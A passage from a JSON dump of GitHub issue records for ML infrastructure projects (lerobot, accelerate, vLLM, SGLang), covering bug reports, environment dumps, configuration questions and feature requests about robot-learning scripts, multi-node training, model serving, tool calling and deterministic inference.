0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: N/A\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4090 D\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n\n`\n```\n\n### Description\n\nFirst of all, thank you for your excellent open-source work. \nI've noticed that LeRobot's code has undergone some significant refactoring recently, especially the code in the hil-serl section. Therefore, I want to re-test the hil-serl code.\n\nI followed the official documentation step by step, but I encountered many problems and don't know how to solve them. The documents: https://huggingface.co/docs/lerobot/hilserl_sim\n\nFirst, I need Recording a Dataset. Therefore, I executed the following script.\n```shell\npython -m lerobot.rl.gym_manipulator --config_path gym_hil/env_config.json\n```\n\nThe gym_hil/env_config.json is like this:\n```\n{\n \"env\": {\n \"name\": \"gym_hil\",\n \"task\": \"PandaPickCubeKeyboard-v0\",\n \"fps\": 10,\n \"robot\": null,\n \"teleop\": null,\n \"processor\": {\n \"control_mode\": \"gamepad\",\n \"gripper\": {\n \"use_gripper\": true,\n \"gripper_penalty\": -0.02,\n \"gripper_penalty_in_reward\": false\n },\n \"reset\": {\n \"fixed_reset_joint_positions\": [0.0, 0.195, 0.0, -2.43, 0.0, 2.62, 0.785],\n \"reset_time_s\": 2.0,\n \"control_time_s\": 15.0,\n \"terminate_on_success\": true\n }\n }\n },\n \"dataset\": {\n \"repo_id\": \"franka_sim_pick_lift_6\",\n \"root\": \"/mnt/hukongtao/codebase/lerobot/franka_sim_pick_lift_6\",\n \"task\": \"PandaPickCubeKeyboard-v0\",\n \"num_episodes_to_record\": 30,\n \"replay_episode\": 0,\n \"push_to_hub\": false\n },\n \"mode\": \"record\",\n \"device\": \"cpu\"\n}\n```\nfrom https://huggingface.co/api/resolve-cache/datasets/lerobot/config_examples/e9cea127f440dab0eb333f8b8007828ce8f48e23/rl%2Fgym_hil%2Fenv_config.json?%2Fdatasets%2Flerobot%2Fconfig_examples%2Fresolve%2Fmain%2Frl%2Fgym_hil%2Fenv_config.json=&etag=%22a4b2ef62f6cee4e31f608639134c07c7e8d3c4ab%22\n\n\nI got my first error:\n```\ndraccus.utils.DecodingError: `processor.gripper`: Could not decode the value into any of the given types:\n GripperConfig: The fields `gripper_penalty_in_reward` are not valid for GripperConfig\n```\nSo I delete gripper_penalty_in_reward in gym_hil/env_config.json. Then I ran the program again. I got another error:\n```\nTraceback (most recent call last):\n File \"/data/hukongtao/miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 196, in _run_module_as_main\n return _run_code(code, main_globals, None,\n File \"/data/hukongtao/miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 86, in _run_code\n exec(code, run_globals)\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/rl/gym_manipulator.py\", line 770, in \n main()\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/rl/gym_manipulator.py\", line 766, in main\n control_loop(env, env_processor, action_processor, teleop_device, cfg)\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/rl/gym_manipulator.py\", line 602, in control_loop\n action_features = teleop_device.action_features\nAttributeError: 'NoneType' object has no attribute 'action_features'\n\n```\nI'm certain this is a bug in the code, because in a simulation environment teleop_device is None. But I don't know how to fix this error.\n\n### Context & Reproduction\n\n```\ngit clone https://github.com/huggingface/lerobot.git\ncd lerobot\npip install -e .[all]\npython -m lerobot.rl.gym_manipulator --config_path gym_hil/env_config.json\n```\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\nI tested the hil-serl code in version 0.3.3 of lerobot, and it worked without any problems.", "url": "https://github.com/huggingface/lerobot/issues/2692", "state": "open", "labels": [ "bug", "documentation", "question", "dataset", "simulation", "tests", "examples", "training" ], "created_at": "2025-12-21T08:22:16Z", "updated_at": "2026-01-04T06:19:05Z", "user": "Hukongtao" }, { "repo": "huggingface/accelerate", "number": 3894, "title": "How to specify different number of process per node", "body": "I've 2 node. First node has 8 gpus while second node has 2 GPUs. I want to specify the number of process to be 8 and 2 respectively in both nodes. I'm using this config in both node. But it always tries to divide equal number of process in both node. With below config file, it's starting 5 process in both nodes:-\n\nNode 1:-\n\n```compute_environment: LOCAL_MACHINE\ndebug: false\ndistributed_type: MULTI_GPU\ndowncast_bf16: 'no'\nenable_cpu_affinity: false\ngpu_ids: 0,1,2,3,4,5,6,7\nmachine_rank: 0\nmain_process_ip: xxxxx\nmain_process_port: 5000\nmain_training_function: main\nmixed_precision: fp16\nnum_machines: 2\nnum_processes: 10\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false \n```\n\nNode 2:-\n```\ncompute_environment: LOCAL_MACHINE\ndebug: false\ndistributed_type: MULTI_GPU\ndowncast_bf16: 'no'\nenable_cpu_affinity: false\ngpu_ids: 0,1\nmachine_rank: 1\nmain_process_ip: xxxx\nmain_process_port: 5000\nmain_training_function: main\nmixed_precision: fp16\nnum_machines: 2\nnum_processes: 10\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false\n```", "url": "https://github.com/huggingface/accelerate/issues/3894", "state": "open", "labels": [], "created_at": "2025-12-21T07:09:15Z", "updated_at": "2025-12-21T07:09:15Z", "user": "AIML001" }, { "repo": "vllm-project/vllm", "number": 31091, "title": "[Usage]: Image Embedding Models (CLIP, Siglip, etc)", "body": "### Your current environment\n\n```text\nroot@3904bdeddb91:/vllm-workspace# python3 collect_env.py\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition\nGPU 1: NVIDIA RTX PRO 6000 Blackwell Max-Q Workstation Edition\n\nNvidia driver version : 580.65.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 43 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 64\nOn-line CPU(s) list: 0-63\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7502 32-Core Processor\nCPU family: 23\nModel: 49\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 1\nStepping: 0\nFrequency boost: enabled\nCPU max MHz: 2500.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 4999.95\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr rdpru wbnoinvd amd_ppin arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sev sev_es ibpb_exit_to_user\nVirtualization: AMD-V\nL1d cache: 1 MiB (32 instances)\nL1i cache: 1 MiB (32 instances)\nL2 cache: 16 MiB (32 instances)\nL3 cache: 128 MiB (8 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-63\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; untrained return thunk; SMT enabled with STIBP protection\nVulnerability Spec rstack overflow: Mitigation; Safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; IBPB conditional; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nVulnerability Vmscape: Mitigation; IBPB before exit to userspace\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n", "url": "https://github.com/vllm-project/vllm/issues/31091", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-21T04:10:10Z", "updated_at": "2025-12-23T03:26:40Z", "comments": 2, "user": "JamesDConley" }, { "repo": "huggingface/lerobot", "number": 2690, "title": "[Bug] Pi0 Inference RuntimeError: Dimension mismatch in Gemma eager_attention_forward (Causal Mask vs Attn Weights)", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2690", "state": "closed", "labels": [ "bug", "question", "policies", "dataset", "CI", "performance", "robots", "examples", "training" ], "created_at": "2025-12-20T16:08:36Z", "updated_at": "2025-12-22T09:34:57Z", "user": "SMWTDDY" }, { "repo": "huggingface/lerobot", "number": 2689, "title": "problem regarding to update aloha sim dataset version v2.1 to v3.0", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nlerobot version 3.0, h100 gpu, openpi repository, training aloha simulation with pi0.5\n```\n\n### Description\n\nDuring training aloha simulation, I updated lerobot aloha sim insertion dataset from compatible with 2.1 to 3.0, the training results showing aloha joints are working weirdly (showing spark of joint actions).\n\nThe dataset conversion followed as below.\n\n```\nlerobot.datasets.backward_compatibility.BackwardCompatibilityError: \nThe dataset you requested (lerobot/aloha_sim_insertion_scripted) is in 2.1 format.\n\nWe introduced a new format since v3.0 which is not backward compatible with v2.1.\nPlease, update your dataset to the new format using this command:\n\npython -m lerobot.datasets.v30.convert_dataset_v21_to_v30 --repo-id=lerobot/aloha_sim_insertion_scripted\n```\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2689", "state": "open", "labels": [ "bug", "question", "dataset", "simulation", "CI", "robots", "training" ], "created_at": "2025-12-20T13:42:39Z", "updated_at": "2025-12-24T00:06:09Z", "user": "conscious-choi" }, { "repo": "sgl-project/sglang", "number": 15524, "title": "[Bug] Deepseek R1 multi-turn tool calling not working", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nThe multi-turn tool calling failed with error: `{\"object\":\"error\",\"message\":\"'dict object' has no attribute 'name'\",\"type\":\"BadRequest\",\"param\":null,\"code\":400}`\n\nHere is the example query:\n```\ncurl http://127.0.0.1:7080/v1/chat/completions -H \"Content-Type: application/json\" -d '{\n \"model\": \"deepseek-ai/DeepSeek-R1\",\n \"stream\": false,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather like in San Francisco?\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"I will check the weather for San Francisco. Please hold on.\",\n \"tool_calls\": [\n {\n \"id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"{\\\"location\\\": \\\"San Francisco, CA\\\"}\"\n }\n }\n ]\n },\n {\n \"role\": \"tool\",\n \"tool_call_id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"content\": \"70 degrees and foggy\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state (both required), e.g. San Francisco, CA.\"\n }\n },\n \"required\": [\n \"location\"\n ]\n }\n }\n }\n ]\n}'\n```\n\nHowever, the same query works for the image back in August.\n\n### Reproduction\n\n*) Start server on B200\n```\npython3 -m sglang.launch_server \\\n --model-path nvidia/DeepSeek-R1-0528-NVFP4 \\\n --port 7080 \\\n --host 0.0.0.0 \\\n --tp-size=8 \\\n --ep-size=8 \\\n --moe-runner-backend=flashinfer_trtllm \\\n --enable-flashinfer-allreduce-fusion \\\n --tool-call-parser=deepseekv3 \\\n --chat-template=/sgl-workspace/sglang/examples/chat_template/tool_chat_template_deepseekr1.jinja \\\n --speculative-num-steps=3 \\\n --speculative-eagle-topk=1 \\\n --speculative-num-draft-tokens=4 \\\n --speculative-algorithm=EAGLE \\\n --trust-remote-code\n```\n\n*) send query\n```\ncurl http://127.0.0.1:7080/v1/chat/completions -H \"Content-Type: application/json\" -d '{\n \"model\": \"deepseek-ai/DeepSeek-R1\",\n \"stream\": false,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather like in San Francisco?\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"I will check the weather for San Francisco. Please hold on.\",\n \"tool_calls\": [\n {\n \"id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"{\\\"location\\\": \\\"San Francisco, CA\\\"}\"\n }\n }\n ]\n },\n {\n \"role\": \"tool\",\n \"tool_call_id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"content\": \"70 degrees and foggy\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state (both required), e.g. San Francisco, CA.\"\n }\n },\n \"required\": [\n \"location\"\n ]\n }\n }\n }\n ]\n}'\n```\n\n### Environment\n\n```\nPython: 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0]\nCUDA available: True\nGPU 0,1,2,3,4,5,6,7: NVIDIA B200\nGPU 0,1,2,3,4,5,6,7 Compute Capability: 10.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.86\nCUDA Driver Version: 580.95.05\nPyTorch: 2.9.1+cu129\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.3.5\naiohttp: 3.13.2\nfastapi: 0.124.2\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.20\npyzmq: 27.1.0\nuvicorn: 0.38.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 2.0.0\nNVIDIA Topology: \n\tGPU0\tGPU1\tGPU2\tGPU3\tGPU4\tGPU5\tGPU6\tGPU7\tCPU Affinity\tNUMA Affinity\tGPU NUMA ID\nGPU0\t X \tNV18\tNV18\tNV18\tNV18\tNV18\tNV18\tNV18\t0-55,112-167\t0\t\tN/A\nGPU1\tNV18\t X \tNV18\tNV18\tNV18\tNV18\tNV18\tNV1", "url": "https://github.com/sgl-project/sglang/issues/15524", "state": "closed", "labels": [], "created_at": "2025-12-20T10:31:36Z", "updated_at": "2025-12-21T01:29:43Z", "comments": 2, "user": "ynwang007" }, { "repo": "vllm-project/vllm", "number": 31066, "title": "[Doc]: Formatting issue in markdown file", "body": "### \ud83d\udcda The doc issue\n\nin [paged_attention.md](https://github.com/vllm-project/vllm/blob/ff2168bca3a195b835c64a5c9012d7b6a9f34e61/docs/design/paged_attention.md#query), there is an issue where a pictures arent formatted correctly and only show the html link .\nFor example, specifically, in the Query subsection, we can see:\n\n`![](../assets/design/paged_attention/q_vecs.png){ align=\"center\" alt=\"q_vecs\" width=\"70%\" }`\n\nThe asset isnt loaded correctly.\n\nThere are a total of **7 such issues**, particularly, we have \n\n- Query subsection - 2 instances.\n- Key subsection - 2 instances.\n- Value subsection - 3 instances\n\n### Suggest a potential alternative/fix\nPerhaps the reference for the images can be checked, it must be broken somewhere\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31066", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-20T06:23:44Z", "updated_at": "2025-12-22T01:38:56Z", "comments": 1, "user": "ssaketh-ch" }, { "repo": "vllm-project/vllm", "number": 31044, "title": "[CI Failure]: Blackwell Fusion Tests", "body": "### Name of failing test\n\nFAILED tests/compile/test_fusion_attn.py::test_attention_quant_pattern[AttentionBackendEnum.TRITON_ATTN-nvidia/Llama-4-Scout-17B-16E-Instruct-FP8-TestAttentionFp8StaticQuantPatternModel--quant_fp8-dtype1-533-128-40-8] - AssertionError: Tensor-likes are not close!\n\n### Basic information\n\n- [x] Flaky test\n- [ ] Can reproduce locally\n- [ ] Caused by external libraries (e.g. bug in `transformers`)\n\n### \ud83e\uddea Describe the failing test\n\nOn B200:\n\nFAILED tests/compile/test_fusion_attn.py::test_attention_quant_pattern[AttentionBackendEnum.TRITON_ATTN-nvidia/Llama-4-Scout-17B-16E-Instruct-FP8-TestAttentionFp8StaticQuantPatternModel--quant_fp8-dtype1-533-128-40-8] - AssertionError: Tensor-likes are not close!\n\n```bash\npytest -v -x tests/compile/test_fusion_attn.py::test_attention_quant_pattern\n```\n\n### \ud83d\udcdd History of failing test\n\nx\n\n### CC List.\n\nx", "url": "https://github.com/vllm-project/vllm/issues/31044", "state": "open", "labels": [ "help wanted", "torch.compile", "ci-failure" ], "created_at": "2025-12-19T18:49:59Z", "updated_at": "2025-12-26T21:58:25Z", "comments": 3, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31043, "title": "[BugFix]: move torch.Size across graphs in split_graph", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWhen fixing a moe x cudagraph issue (see #30914), we found that `split_graph` may generate a submodule that returns a torch.Size and later another submodule that takes torch.Size. This errors since pt2 somehow does not support `torch.Size` as output yet. \n\nOne fix is to manually reorder some lines in the model code to avoid this split happen between getting the `torch.Size` and using it. But this is too intrusive and requires manual efforts on many models.\n\nA more automated approach is to have a graph pass in `split_graph` to move the torch.Size a bit to avoid patterns like\n\n```\n# Old:\nsize = tensor_a.shape\nsome_cg_unsafe_op\ntensor_b = tensor_b.view(size)\n```\n---->\n\n```\n# New:\nsome_cg_unsafe_op\nsize = tensor_a.shape\ntensor_b = tensor_b.view(size)\n```\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31043", "state": "open", "labels": [ "help wanted", "feature request", "torch.compile" ], "created_at": "2025-12-19T18:24:58Z", "updated_at": "2025-12-22T21:23:04Z", "comments": 1, "user": "BoyuanFeng" }, { "repo": "vllm-project/vllm", "number": 31039, "title": "[Feature]: Integrate Sonic MoE", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nhttps://x.com/wentaoguo7/status/2001773245318541324?s=46&t=jLcDgQXDbYe6HgFmTNYgpg\nhttps://github.com/Dao-AILab/sonic-moe\n\nCurious to see benchmarks!\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31039", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-19T17:29:59Z", "updated_at": "2026-01-04T14:10:21Z", "comments": 4, "user": "robertgshaw2-redhat" }, { "repo": "sgl-project/sglang", "number": 15481, "title": "[Bug] Seeded Deterministic/Batch Invariant Inference Not Working on v1/completions endpoint", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nI\u2019m trying to enable batch-invariant (deterministic) inference while serving SGLang behind an OpenAI API-compatible interface.\n\nDeterministic inference docs: https://docs.sglang.io/advanced_features/deterministic_inference.html\n\n## What works\n\nThe native /generate endpoint correctly varies output by seed and is repeatable per seed.\n\nExample request:\n\nPOST {base}/generate\n```json\n{\n \"text\": \"generate a uuid. UUID:\",\n \"sampling_params\": {\n \"temperature\": 1,\n \"max_new_tokens\": 32,\n \"sampling_seed\": 0\n }\n}\n```\n\nBehavior: changing sampling_seed changes the output; repeating with the same sampling_seed reproduces it.\n\n## What doesn\u2019t work\n\nOn the OpenAI-compatible endpoint POST {base}/v1/completions, seed appears to have no effect (even with temperature=1 and top_p=1).\n\nExample:\n\nPOST {base}/v1/completions\n```json\n{\n \"model\": \"Qwen/Qwen3-30B-A3B\",\n \"prompt\": \"generate a uuid. UUID: \",\n \"max_tokens\": 32,\n \"temperature\": 1,\n \"top_p\": 1,\n \"n\": 1,\n \"seed\": 0\n}\n```\n\nBehavior: response is the same regardless of seed value.\n\nExpected behavior\n\nWith --enable-deterministic-inference, I expected the OpenAI-compatible endpoints to:\n* honor seed as the sampling seed (analogous to sampling_seed), and\n* remain deterministic/repeatable for the same (prompt, params, seed).\n\n### Reproduction\n\nServer launch:\n\n```bash\nexec python3 -m sglang.launch_server \\\n --model-path \"Qwen/Qwen3-30B-A3B\" \\\n --host 0.0.0.0 \\\n --port 8000 \\\n --tp \"1\" \\\n --attention-backend \"triton\" \\\n --context-length \"32000\" \\\n --trust-remote-code \\\n --enable-deterministic-inference\n```\n\nPOST {base}/v1/completions\n```json\n{\n \"model\": \"Qwen/Qwen3-30B-A3B\",\n \"prompt\": \"generate a uuid. UUID: \",\n \"max_tokens\": 32,\n \"temperature\": 1,\n \"top_p\": 1,\n \"n\": 1,\n \"seed\": 0\n}\n```\n\nvarying the seed results in same output\n\n### Environment\n\n==========\n== CUDA ==\n==========\nCUDA Version 12.9.1\nContainer image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.\nThis container image and its contents are governed by the NVIDIA Deep Learning Container License.\nBy pulling and using the container, you accept the terms and conditions of this license:\nhttps://developer.nvidia.com/ngc/nvidia-deep-learning-container-license\nA copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.\nAuto-detected 1 GPU(s)\nPython: 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0]\nCUDA available: True\nGPU 0: NVIDIA RTX PRO 6000 Blackwell Server Edition\nGPU 0 Compute Capability: 12.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.86\nCUDA Driver Version: 580.105.08\nPyTorch: 2.9.1+cu129\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.3.5\naiohttp: 3.13.2\nfastapi: 0.124.2\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.20\npyzmq: 27.1.0\nuvicorn: 0.38.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 2.0.0\nNVIDIA Topology:\n\t\u001b[4mGPU0\tNIC0\tCPU Affinity\tNUMA Affinity\tGPU NUMA ID\u001b[0m\nGPU0\t X \tSYS\t0-63,128-191\t0\t\tN/A\nNIC0\tSYS\t X\nLegend:\n X = Self\n SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\nNIC Legend:\n NIC0: mlx5_bond_0\nulimit soft: 1024", "url": "https://github.com/sgl-project/sglang/issues/15481", "state": "closed", "labels": [ "bug", "high priority" ], "created_at": "2025-12-19T15:04:26Z", "updated_at": "2025-12-20T04:32:15Z", "comments": 8, "user": "jamesheavey" }, { "repo": "huggingface/lerobot", "number": 2684, "title": "How to manually push a dataset", "body": "Say you `lerobot-record` a dataset with the flag `--dataset.push_to_hub=False`, or you encounter any problem at uploading time.\n\nIs using `hf upload` enough, or does `lerobot` datasets need additional stuff?", "url": "https://github.com/huggingface/lerobot/issues/2684", "state": "open", "labels": [ "documentation", "question", "dataset" ], "created_at": "2025-12-19T13:00:20Z", "updated_at": "2025-12-19T15:41:42Z", "user": "mcres" }, { "repo": "vllm-project/vllm", "number": 31023, "title": "[Doc]: FP8 KV Cache: Does softmax output multiply with FP8 V directly or after dequantization?", "body": "### \ud83d\udcda The doc issue\n\nhttps://docs.vllm.ai/en/v0.8.5.post1/features/quantization/quantized_kvcache.html\nQuestion:\nIn the FP8 KV Cache implementation, after computing attention scores and softmax at higher precision (FP16/BF16), is the resulting attention weight matrix:\nQuantized to FP8 and multiplied directly with FP8 V cache, or\nMultiplied with V cache after dequantizing V to higher precision?\nThe documentation mentions \"no fused dequantization and attention operations yet\" but doesn't specify the precision of this final multiplication. Clarifying this detail would help understand the accuracy-performance tradeoff.\nThanks!\n\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31023", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-19T10:33:22Z", "updated_at": "2025-12-22T00:41:38Z", "comments": 0, "user": "jorjiang" }, { "repo": "vllm-project/vllm", "number": 31019, "title": "[Bug]: Qwen3-VL 2:4 sparsity llm-compressor RuntimeError: shape mismatch (0.12, 0.13rc2)", "body": "### Your current environment\n\n
